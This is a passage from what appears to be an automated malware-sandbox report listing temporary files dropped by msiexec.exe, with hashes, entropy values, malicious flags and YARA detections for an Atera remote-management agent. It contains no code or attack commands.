                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:QYz8Ph4uRc06WXzAFT5FRddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:Lah411FTvdWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:B92FF4A308F3B808673B7406600F4685
                                                                                                                                                                                                                                                                                                                                  SHA1:D67BCB2BE319C693B6EE2556516F093B93C0E2E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D3A6AEC26C39755D64BB97348F23917D9AED9FCCF952344969E231E9510AC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4BD28F2284DA96EEE715B9A30C5F0EEB778EFD4DE530F04E97476592E121E9BF9A33EF88CFE8BD0AEB19F48BC58EF4A47736C6AD4E96EE7979DF4703601D9D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF45939A071886D6FE.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF47B551ADC425F4FB.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07928728571212156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO/LfNzGelhqLIUSVky6l/X:2F0i8n0itFzDHFjfIaqR/X
                                                                                                                                                                                                                                                                                                                                  MD5:EA6B4F3F0C52181E2913C44F1E8F4FC1
                                                                                                                                                                                                                                                                                                                                  SHA1:730E207F58450786A296AD2820F2821C977E18FA
                                                                                                                                                                                                                                                                                                                                  SHA-256:4443883A6AA19E21D84A287DB3BA806503985BC5501AC985751F9834BBF06C1E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6FA55D6BB02E5D55671D0DF89D6852CCE2FDE965028F1CA2BA78703609EE3F2C80A92DF74D61DCF486FFF920EE80208F68E087FF8E1F2711DDAB637E7FB1AC9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF48BCAB6E3000FF9C.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.15843847478459164
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:KlEuSsndd4dASjndd4d/EqdGUDjxbQ97ddr:KD/93DtkJd
                                                                                                                                                                                                                                                                                                                                  MD5:352D69374E9E1F6BAFC46A6AF75B827E
                                                                                                                                                                                                                                                                                                                                  SHA1:79EE118545DC3950BE51FEAA5A39EE44E21AAF2B
                                                                                                                                                                                                                                                                                                                                  SHA-256:54C6BC624F74974A6EC79473A0280DB8B6B8DDC8500330028A8E25C3CA67B439
                                                                                                                                                                                                                                                                                                                                  SHA-512:AA1DBE86330156FDB723409615DF6D7ECB8020B8E92E9D640A0DC688BB5F8B64ECAF83B0A63948C4B56F8D064FE210C238BA7B17AC00D58DF068F0898E537CAB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF48BCAB6E3000FF9C.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF4BDFDDF68F93C3AD.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6016373332287588
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:v8PhTuRc06WXz+FT5RdXynMSjndddwEqdGUDjxbQiSsndddSE8ly:uhT1jFTlCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:65ECED2C79FFBFDA5DA7C3090F89513B
                                                                                                                                                                                                                                                                                                                                  SHA1:2DC29C13D2BF2E2527CFC4E929969436DBA0AA04
                                                                                                                                                                                                                                                                                                                                  SHA-256:A32952614B92F166011E18EA13A33E2D57896715C1B0B45EFE55A748D23D9AD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:759F4544CB4E8C01EF89378155D54F3874A4B2CD7198F9C9F92F392C84442859874CEFFD77B119F89DE172FF8F9A355DA6F2C372B0E3EA6CF2C08E73B09EE188
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4BDFDDF68F93C3AD.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF574CAF82F43C6E65.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF5F816C3F16BA431F.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3015028554555976
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Jx/jO38PhMuh3iFip1GE2yza2t4KAQBHofagUMClXte/+oAWS+HesXwZymiL:A8PhMuRc06WXOCFT5aXAWSiXwZy9
                                                                                                                                                                                                                                                                                                                                  MD5:2A5B227715CA7D8BE6719C9EAE981221
                                                                                                                                                                                                                                                                                                                                  SHA1:863D008A637B38524033BAED0F4324A04668FAE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:305504B686A4848F0E09C804E97C48DCBAB789334DE7B75F7AB4E85EE20A9891
                                                                                                                                                                                                                                                                                                                                  SHA-512:D4EC0B7D7028C8A1E211EA39BE693A57F7FD1E24BFD7DA90DB8A40834088F3E348CA8FC73FBEB753925F583F6246F07C409B8A16D164FC779A8903F1C290A94E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF5FFAEC852D3EE7BC.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF61975BFD552F8572.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.06933753910613097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOS6Up3s0tGyVky6l3X:2F0i8n0itFzDHFS6Q80tE3X
                                                                                                                                                                                                                                                                                                                                  MD5:EE6C9C4CE73CF06A832D9D6CDF144455
                                                                                                                                                                                                                                                                                                                                  SHA1:8A37888B82161D3D89C7D086D8B3FB47D7880314
                                                                                                                                                                                                                                                                                                                                  SHA-256:7800E5FA5BFA56310692B68C24621B44AD205CA04C5AA1A263ADE954FE97A142
                                                                                                                                                                                                                                                                                                                                  SHA-512:D10B5BBDB0753AF8F102388AAF119655DF603384F3FB99687DB9ED25F73868292618702394B136F5F662F8CFB012EA84F24B0B60F038C58976E2722E04ADEC45
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF6260B0A6EE189872.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.278218715250536
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VOLuXth8FXz/T5b/dXynMSjndddwEqdGUDjxbQiSsndddSE8ly:gLXBTVVCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:F86B0BFFC128D2A5E37EE400EB92F02F
                                                                                                                                                                                                                                                                                                                                  SHA1:1881A81F7AF0442DF010985DC914E5374E458899
                                                                                                                                                                                                                                                                                                                                  SHA-256:C70304084C95123C5A99FAC85999E7587216DDD45860D07A49468BCB7ED7AF4C
                                                                                                                                                                                                                                                                                                                                  SHA-512:8C2B2C1E23742726CDF830CCECDE32582712073874775107A6C48089027667677F9628CC3CA9E95F267D300B949FDCD13CE9012351F136F1B8F4B1954F290252
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6260B0A6EE189872.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF6770E5F65DEE8E27.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2803037319099166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:1hwu3th8FXzFT56RddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:vw3rTedWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:97FCD8DB13449BB7051CDBBC66340A8E
                                                                                                                                                                                                                                                                                                                                  SHA1:8BD72069DDC94AC7652D506AEBF9C1BC0902B9E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8411B750B766953310DD9514B4EF04C840DE7BF097669DBF777FE93D27C7563B
                                                                                                                                                                                                                                                                                                                                  SHA-512:92E1295FB946069A1FFA1E3D627B5C01651FAAEB00943A4CE0B21D651D8AA482CA472EB7B27B79FC9E287F4A3A4BEC6EF2B57CD7C71AD9CBCC2430A8EA95E6D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6770E5F65DEE8E27.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF6B3BD24D01329A5D.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5652099008809222
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:kk8PhluRc06WXJunT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:yhl1FnT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:4E836F3DC1F6DD87B0B768970901FB58
                                                                                                                                                                                                                                                                                                                                  SHA1:BD5142D32B62A69699501118885819ED7CFC41F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A740CB63701F6F99CBF01E7ECA2A5AAD3F0A27E547BB50838DD024281766973
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9C7B777D4C8FF60DFE3D7325ECD0AA9B057C23697000843B964D9B6A942EC7CA11C8E4AF0E721AC8F7FE80DAAC6F6B3FC657275E7FAA898CF36F1BA6097D6FC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6B3BD24D01329A5D.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF7114257AF1E30F75.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF74885C14D27EA5BA.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF76F9C01C1847C9B1.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF80D7778D11B44FD9.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF80F0F0EF5EAF0872.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.278218715250536
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VOLuXth8FXz/T5b/dXynMSjndddwEqdGUDjxbQiSsndddSE8ly:gLXBTVVCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:F86B0BFFC128D2A5E37EE400EB92F02F
                                                                                                                                                                                                                                                                                                                                  SHA1:1881A81F7AF0442DF010985DC914E5374E458899
                                                                                                                                                                                                                                                                                                                                  SHA-256:C70304084C95123C5A99FAC85999E7587216DDD45860D07A49468BCB7ED7AF4C
                                                                                                                                                                                                                                                                                                                                  SHA-512:8C2B2C1E23742726CDF830CCECDE32582712073874775107A6C48089027667677F9628CC3CA9E95F267D300B949FDCD13CE9012351F136F1B8F4B1954F290252
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF80F0F0EF5EAF0872.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF8959754CB5C77D85.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.15754443212956704
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:KyuBEuSsndddPSjndddwEqdGUDjxbQ9IdXy:Puv9f3DtUgC
                                                                                                                                                                                                                                                                                                                                  MD5:FFD8FF5F083A6ED75AFB5E6CD484C1E5
                                                                                                                                                                                                                                                                                                                                  SHA1:9CAD924ADFE1D84A31E35FA83E8559BFEFD756E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:A7FF3C693BBF3940EA4F22C6CB85BF8D7378FA4C563256C0A2B4B180F8851161
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACEAF80CCCB6D974DDC4944A6D64608F42989E0C4C9965ED5C9BA39D8212576F407E7D89F3C0C95192D574C31C8479CCFC65F3689B2D388439487DF2C66F2B22
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8959754CB5C77D85.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF8A16C3F993DEA717.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF8B9C4281082EB5A9.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5701014991086903
